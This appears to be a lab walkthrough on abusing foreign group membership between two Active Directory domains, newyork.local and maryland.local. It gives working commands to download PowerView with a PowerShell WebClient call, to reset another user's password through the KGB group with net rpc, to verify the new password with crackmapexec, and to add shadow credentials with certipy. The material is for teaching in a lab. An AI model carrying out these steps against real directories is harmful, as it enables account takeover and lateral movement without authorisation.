Foreign group and users

Foreign group and users

  • On bloodhound we can see very easily that there is link between the domains with the following query (Careful this query is fine in a lab but this will certainly be a little too heavy in a real world AD)




  • On the lab you will find some specifics groups to pass from one domain to the other.

  • As you already have done the acl part previously you will easily find the way to exploit that.

  • newyork.local to maryland.local: group KGB

  • To do that just pick a user from the RadioCity and exploit with the KGB group


xfreerdp /d:newyork.local /u:diego.montenegro /p:letsdothis /v: /cert-ignore

Loading PowerView.ps1 to ParrotOS Lab Machine


Uploading it to the Windows Server

powershell.exe (New-Object System.Net.WebClient).DownloadFile('', 'C:\Users\diego.montenegro\Documents\PowerView.ps1')
Get-NetGroupMember -Identity "KGB" -Domain Maryland.local

Change Teresa PWD

net rpc password teresa.Perez -U newyork.local/diego.montenegro%letsdothis -S baltimore.maryland.local
Enter new password for teresa.Perez: <here we enter Password123>

And verify

crackmapexec smb -u teresa.Perez -p 'Password123' -d maryland.local
  • We can also to that with shadow credentials (but the auto will not work here, we will have to do that with two steps)

certipy shadow add -u diego.montenegro@newyork.local -p 'letsdothis' \
 -dc-ip -target baltimore.maryland.local -account 'teresa.perez'
certipy auth -pfx teresa.perez.pfx -username teresa.perez -domain maryland.local -dc-ip
  • Maryland to NewYork : group MainMultiDoms

In the same way we can exploit the Maryland to NewYork foreign group

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